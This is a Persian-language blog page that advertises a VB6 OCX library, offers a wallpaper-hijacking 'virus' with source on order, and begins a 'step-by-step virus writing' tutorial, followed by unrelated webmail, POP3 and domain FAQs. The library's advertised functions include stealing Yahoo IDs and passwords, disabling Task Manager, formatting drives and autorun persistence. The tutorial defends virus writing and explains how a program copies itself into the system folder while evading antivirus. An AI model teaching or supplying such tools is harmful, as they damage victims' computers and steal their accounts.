در این مجموعه که توسط گروه ما جمع آوری شده است دستوراتی ساده شده وجود دارد که به جای نوشتن کد های آن می توانید با یک خط از آن استفاده کنید.مثلا برای ارسال ایمیل به ده ها خط برنامه نویسی نیاز دارید ولی با این مجموعه فقط در یک خط یک ایمیل ارسال کنید.

برای استفاده از این مجموعه شما باید در قسمت کامپوننت ها (Components) این فایل(XSX.OCX) را انتخاب کنید(Browse) و انر تیک دارد کنید و در برنامه نویسی از آن استفاده کنید مثلا برای ارسال ایمیل:

"XSXToolz1.SendMail " mail@from.you ", " mail@TO.com ", "Subject", "Body

وی دیگر عملیات مورد نیاز:

1- Always on Top برای فرم ها و هر هندل.

۲- تبدیل رشته ای از کاراکترهای یونیکد به کدهای ASCII.

3- تبدیل رشته ای از کد های ASCII به کاراکتر های یونیکد.

۴- تغییر ژس زمینه میز کار(Desktop Wallpaper)

5- قرنتینه موس در محدوده فرم به صورتی که موس نتواند از محدوده فرم خارج شود.

6- غیر فعال کردن راست کلیک بر روی فایل ها.

7- غیر فعال کردن مدیروظایف Task Managerیا همان (Ctrl + Alt + Del).

8- فرمت غیر مستقیم درایو ها.

9- گرفتن عکس از تصویر مانیتور و ذخیره آن در فایل.

10- گرفتن آدرس پوشه سیستم.

11- گرفتن رمز و آی.دی یاهو.(در صورت نیاز به کمک با ما درمیان بگزارید)

12- مخفی کردن Folder Options.

13- تشخیص اتصال به اینترنت.

۱۴- قفل کردن یک پنجره بوسیله دادن هندل.

۱۵- Minimize کردن یک پنجره با دادن هندل آن.

۱۶- مخفی کردن Display Properties در راست کلیک در بروی میزکار(ِDesktop).

17- مخفی کردن Properties در راست کلیک در روی My Computer.

18- غیر فعال کردن تغییر تصویر میزکار(Desktop).

19- خواندن محتویات یک فایل.

20- بستن یک پنجره با دادن هندل آن.

21- ارسال ایمیل بسیار آسان.

22- قرار دادن مختصات موس در مختصات وارد شده.

23- مخفی یا آشکار کردن یک پنجره از روی مانیتور با دادن هندل ان(پنجره را نمی بندد فقط مخفی می شود)

24- مخفی یا آشکار کردن موس.

25- قرار دادن خاصیت اجرای خود کار برنامه(بعد از هربار بالا آمدن ویندوز برنامه شما اجرا شود)

26- جابه جایی کلیک چپ و راست موس.

27- مخفی یا آشکار کردن نوار وظیفه (Taskbar).

28- نوشتن اطلاعاتی در یک فایل.

حجم فایل: 24 کیلوبایت

لینک دانلود

: تغییر در پس زمینه ( ویروس نویسی حرفه ای )

Wallpaper :    تغییر در پس زمینه

چند وقت پیش یکی از بازدید کنندگان این وبلاگ این ویروس را سفارش دادند که کمتر جایی آنرا دیده اید . این ویروس جالب در مرحله اول آدرس پس زمینه  کامپوتر را گرفته

و عکسی را بر روی Wallpaper کامپیوتر فرد   درج می کند ! به طوری که با عوض کردن دوباره  پس زمینه  این کار نیز دوباره انجام می شود ! سورس این ویروس ساده نیز هست البته کسانی که خود ویروس را می خواهند باید عکس مورد نظر خودرا (همان عکسی که قرار است بر روی کامپیوتر فرد قربانی درج شود) برای ما ارسال کنند و بعد در همین پست به ما نظر بدهند . برای دیدن گوشه ای از خرابکاری این ویروس بر روی ادامه مطلب کلیک کنید.

ویروس به همراه سورس (حجم 200 کیلو بایت)

 

آموزش پله به پله ویروس نویسی

اگر ویروس نویسی جرم است به جای ما به دنبال سازنده ویروس ایدز باشید که تمام جوانان را به دام خود برده و تا به حال ویروس کش آن را نتوانستند بسازند نه McAfee نه Symantec#

آیا می دانید بهترین کامپایلر ویروس چیست(منظور زبان های برنامه نویسی است)؟

بسیاری بر این عقیده اند که ویژوال بیسیک ۶ بهترین کامپایلر است تا زمانی که ویندوز وجود دارد و ساختارش چنین باشد.اما بسیاری هم دلفی را به عنوان زبان ویروس خود انتخاب کرده اند،اما این مهم نیست، مهم خلاقیت ویروس نویس و مهارت وی است.

گروه ما هم عقیده اول را قبول دارد زیرا در تمامی ویندوز های XP و 2000 و فایل مورد نیاز برنامه های وی.بی وجود دارد و همچنین برنامه نویسی با ویژوال بیسیک 6 بسیار ساده و راحت می باشد به طوری که یک فرد می تواند در مدت زمان کمتر از 6 ماه ویروس نویسی خوب شود.

از تمامی این حرف ها می گذریم...

پله اول مرحله اول

در این مرحله باید با ویژوال بیسیک و Syntax آن و چندین نکته ساده را بیاموزید(به دلیل این که در این دوره آموزشی قصد ما تنها آموزش های ویروس نویسی است این مرحله را به عهده خودتان می گذاریم،می توانید از فروم های فارسی در این زمینه و کتاب های آموزشی استفاده کنید)

پله اول مرحله دوم

در مرحله باید تمامی افکار خود را به سمت ویروس نویسی برده و خود را برتر ببینید ولی به هیچ عنوان زیاده روی(لاف) نکنید.

با یک مثال بسیار ساده شروع می کنیم:

توضیحات دقیق:
اگر دقت کنید،
در سطر اول کد نویسی از دستور Set استفاده کردیم،این دستور یک شیء را در یک متغیر ذخیره میکند.پس از آن نام متغیر و سپس از دستور CreateObject استفاده کردیم،این دستور با یکی از کلاس های رجیستر شده در سیستم(ویندوز) را صدا زده و استفاده می کند.برای مثال اگر Internet Explorer را در سیستم خود داشته باشید(که اگر از سیستم عامل ویندوز استفاده می کنید حتما دارید) یک کلاس با نام'InternetExplorer.Application' در سیستم رجیستر می شود که می توان با استفاده از آن یک مرورگر را باز کرده و کنترل تقریبا کامل را روی آن داشته باشید.(برای دیدن لیستی از بعضی از کلاس های رجیستر شده در ویندوز می توانید در برنامه جانبی Registry Editor پوشه یا کلید HKEY_CLASSES_ROOT را باز کرده و آن ها را مشاهده کنید.توجه داشته باشید تمامی پوشه های این کلید کلاس نیستند).در اینجا ما با استفاده از دستور CreateObject یک کلاس را که مدیریت فایل ها و پوشه های ویندوز را می تواند انجام دهد،صدا زدیم،به نام''
هنگامی که شما یک شی را با استفاده از دستور Set صدا می زنید ،باید همانند اشیای دیگر وی.بی(مثل TextBox) از آن استفاده کنید.یعنی برای استفاده از یک تابع آن باید نام متغیر را نوشته سپس یک نقطه زده و نام تابع را بنویسید.مثل:
fso.FunctionName
فراموش نکنید که CreateObject یک تابع از پیش تعریف شده در وی.بی می باشد.
*نکته*اگر یک شی را با استفاده از تابع یا دستور CreateObject بسازید،مانند اشیای اصلی وی.بی هنگامی که یک نقطه پس از نام آنها بزنید لیست خصوصیات و توابع را نمایش نمی دهد و شما باید از قبل آن ها را بدانید.(البته اگر فایلی که منبع کلاس است را در قسمت References از منوی Project وارد پروژه کنید می توانید آن را با اسفاده از Dim صدا بزنید که در این صورت لیست مذکور با می شود)
و در سطر دوم یکی از توابع کلاس FileSystemObject را صدا زدیم(GetSpecialFolder)این تابع آدرس پوشه های اصلی ویندوز را برای ما برمیگرداند مثل آدرس پوشه 'System32' یا 'Windows' یا 'Temp' .پس تابع پرکاربردی است،ولی مشکل اساسی این است که بسیاری از ضد ویروس ها به استفاده از این تابع حساسیت دارند.این تابع تنها یک آرگومان نیاز دارد که یک شماره است این شماره از 0 تا 2 می باشد در زیر رشته برگردانده شده تابع را نسبت به اعداد وارد شده می بینید:
اگر 0 بدهیم آدرس پوشه ویندوز را برمیگرداند.
اگر 1 بدهیم آدرس پوشه سیستم را برمی گرداند.
اگر 2 بدهیم آدرس پوشه Temp یا فایل های موقت را برمیگرداند.
*نکته* اگر دقت کنید پس از نام متغیر این خط(Sys) یک علامت $ آورده ایم.این علامت به این معناست که متغیر را از نوع String در نظر بگیرد.از این علامت ها زمانی استفاده که نخواهیم متغیر را با استفاده از دستور Dim ایجاد کنیم.برخی علامت در زیر آمده است:
$ برای String
# برای Double
% برای Integer
! برای Single
& برای Long
@ برای Currenry
در سطر سوم یکی از روال های کلاس مذکور را صدا زدیم که این روال یک فایل را در رایانه کپی می کند.این روال حداکثر سه آرگومان نیاز دارد و حداقل دو آرگومان نیاز دارد. منظور چیست؟ منظور این است که دو آرگومان اصلی دارد و یک آرگومان اختیاری دارد.شکل اصلی این روال به صورت زیر است:
Source آدرس فایل اصلی که می خواهیم کپی است.
Destination آدرسی است که می خواهیم فایل آنجا کپی شود،است.
آرگومان سوم از نوع Boolean است یعنی یا 0 یا 1(True Or False) که اگر False باشد و فایلی در آدرس Destination وجود داشته باشد آن فایل را کپی نمیکند ولی اگر True باشد در صورت وجود فایل آن را رونویسی (Overwrite) می کند و فایل اصلی جای آن کپی می شود.
اگر دقت کنید آرگومان اول یعنی آرس فایل اصلی را به این گونه وارد کرده ایم:
App یکی از شی های وی.بی است که در آن می توانید خصوصیاتی از برنامه اجرایی خود ببینید.برای مثال چک کنید که آیا برنامه قبلا اجرا شده یا نه:
که ااگر برنامه شما قبلا اجرا شده باشد متغیر P برابر می شود با True و اگر برنامه قبلا اجرا نشده باشد مقدار False را برمی گرداند.
در اینجا ما از دو خصوصیت Path و EXEName استفاده کرده ایم ،
در خصوصیت Path مسیر فایلی ذخیره می شود که برنامه از آن اجرا می شود،مثلا اگر برنامه شما اینجا باشد:
C:\XSX_Learn\XSX_Team.Exe
در خصوصیت Path مقدار C:\XSX_Learn ذخیره می شود.
و در خصوصیت EXEName نام فایل اجرایی شما می باشد که در همان مثال بالا برابر XSX_Team می باشد.
*نکته*اگر دقت کنیددر آخر مقدار خصوصیت Path علامت \ نشان داده نمی شود و همچنین در آخر EXEName پسوند ذخیره نمی شد.پس اگر این کد را در همان مثال بالا نوشته باشیم و برنامه را اجرا کنیم:

این مقدار نمایش داده می شود:
C:\XSX_LearnXSX_Team
پس برای تصحیح کد بالا باید آن را به این گونه تغییر بدهیم:
به این منظور که گفته ایم بعد از آدرس پوشه علامت \ را اضافه کند و همچنبن بعد از نام فایل اجرایی پسوند آن را اضافه کند(Exe).که مقدار نمایش داده شده به این صورت می شود:
C:\XSX_Learn\XSX_Team.Exe
بقیه آرگومان ها هم بسیار واضح است ولی تنها نکته این اینست که متغیر Sys مقداری برابر مثلا 'C:\Windows\System32' دارد و همین طور میبینید در آخر آن علامت \ وجود ندارد.
*نکات توضیحی اضافه*
1 - فرق تابع(Function) با روال این است که تابع مقداری را بر می گرداند ولی روال یا Sub مقدار برگشتی ندارد.
2 - رشته ها در وی.بی با استفاده از علامت & به یکدیگر می چسبند.

تشخیص وجود اتصال به اینترنت

با استفاده از این API میتوانید تشخیص دهید که آیا سیستم به اینترنت متصل است یا خیر.طبق معمول اگر متصل باشد مقدار True  و در غیر این صورت False  را بر می گرداند.
کد:

آموزش استفاده از WebMail و POP3

لینک ارتباطی به WebMail

 برای ورود به بخش پست الکترونیک از طریق Web می بایست در قسمت Address مرورگر کامپیوتر خود(مانند Internet Explorer)، یکی از آدرسهای زیر را وارد نمایید و Enter کنید.

http://yoursite.com/webmail/
یا
http://yoursite.com:2095

در روش دوم اجباریست Internet Explorer در http:// نوشتن جمله

پس از وارد شدن به یکی از روش های بالا نام کاربری و رمز عبور خواسته می شود که باید نام کاربری و رمز عبور آدرس ایمیل مورد نظر را وارد کنید.
لازم به توضیح است نام کاربری در اینجا، همان آدرس ایمیل ساخته شده توسط شما می باشد.
بعد از این مرحله، با یکی از 3 نرم افزار مدیریت ایمیل که روی صفحه می آید، می توانید وارد کلیه قسمت های ایمیل خود شوید.
پیشنهاد می کنیم از Horde استفاده کنید.

     

Ùبرو بالاÙ

آدرس POP3 و SMTP

 برای استفاده ایمیل خود در نرم افزار های POP3(مانند Outlook)، باید در محل مربوطه تنظیمات را مانند زیر انجام دهید:

 لازم به توضیح است، در صورتی که تمایل به استفاده از IMAP دارید، استفاده از این سرویس هم به شکل مشابه با POP3 می باشد.(همانند شکل زیر)

Ùبرو بالاÙ

معرفی یک نرم افزار مدیریت ایمیل و طریقه کار با آن

 نرم افزاری که ما به شما معرفی می کنیم، نرم افزار Outlook است، این نرم افزار روی کلیه سیستم عامل های Windows نصب می باشد.

با باز کردن این نرم افزار، باید به منوی Tools رفته و گزینه E-mail Accounts را انتخاب کنیم.

در این قسمت با انتخاب Add a new e-mail account درخواست ایجاد مدیریت ایمیل جدیدی را می دهید و بعد از زدن Next نوع ارتباط خود با پست الکترونیک انتخاب می کنید(مثلاً POP3) و پس از پر کردن اطلاعات شخصی و اطلاعات ایمیل Next و Finish را می زنید.

لازم به توضیح است، User Name شما در کلیه ایمیل ها، همان آدرس ایمیل شما می باشد.

پس از نصب ایمیل خود روی Outlook می توانید به ارسال و دریافت نامه ازطریق این برنامه اقدام نمایید.

Domain -میل

::  تعاریف اولیه
          Domain چیست ؟
          hosting یا میزبانی وب چیست ؟
          منظور از Sub Domain چیست ؟
          WHOIS چیست؟
          رابطه Domain با Hosting  چیست ؟
          منظور از FTP Account چیست ؟
          منظور از  (Domain Aliasing (URL Forwarding چیست ؟
          DNS یا Name Server چیست ؟

» Domain چیست ؟
معادل کلمه قلمرو می باشد ، هر فرد حقیقی یا حقوقی می تواند صاحب Domain ( قلمرو ) در اینترنت باشد . به عنوان مثال
amrdesign.ir یک Domain است که در اینترنت به این شکل آدرس دهی می شود :      http://www.amrdesign.ir

» hosting یا میزبانی وب چیست ؟
میزبانی وب بدین معنی است که شما بتوانید صفحات طراحی شده وب سایت خود را در فضایی روی اینترنت قرار دهید ، بدین معنی که ، به فضای اختصاص داده شده به شما دسترسی کامل دارید ، می توانید فایلهای خود را upload (بالاگذاری) کنید ، آمار مربوط به سایت خود را داشته باشید ، و هر بخش کوچک روی سایت و ایمیل های تحت دومین خود را مدیریت کنید و .....

» منظور از Sub Domain چیست ؟
نامی است که قبل از Domain اصلی قرار می گیرد و با نقطه از آن جدا می شود . به عنوان مثال
amrdesign.ir یک Domain است و forum.amrdesign.ir یک Sub Domain است .

» WHOIS چیست؟
Whois امکانی است که اجازه می دهد مردم بتوانند نام و اطلاعات تماس مالک دومین را مشاهده کنند.

»  رابطه Domain با Hosting  چیست ؟
Domain نامی است که شما برای سایت خود انتخاب می کنید و Hosting  میزبانی است که به Domain شما سرویس دهی می کند ، مانند اختصاص فضا ، Email و ...

» منظور از FTP Account چیست ؟
برای انتقال فایلها از کامپیوتر بر روی سرویس دهنده، حداقل به یک FTP Account برای برقراری ارتباط نیاز دارید . در صورتی که اپراتورهای سایت شما بیش از یک نفر باشند می توانید برای هر کدام یک FTP Account مستقل ایجاد و اجازه دسترسی آنها را به دایرکتوریها یا فایها با قابلیت خواندنی، نوشتنی و ... تعیین نمائید .

» منظور از  (Domain Aliasing (URL Forwarding چیست ؟
به ارجاع مستقیم سایت شما به آدرس URL دیگر گفته می شود ، به عنوان مثال : اگر در قسمت آدرس ، سایت شما تایپ شود http://www.sample1.com می توانید آدرس دیگری مانند :
 http://www.sample2.com را تعیین نمائید تا بصورت اتو ماتیک به آن ارجاع( Forward ) شود.

» DNS یا Name Server چیست ؟
Dns آدرس سایتی است که شما برای میزبانی وب در نظر گرفته اید و باید مشخصات ٫آن را از میزبان وب خود سوال نمایید .
برای مثال Dns های ما عبارتند از:

  1. ns1.amrdesign.ir

  2. ns2.amrdesign.ir

ادامه مطلب ...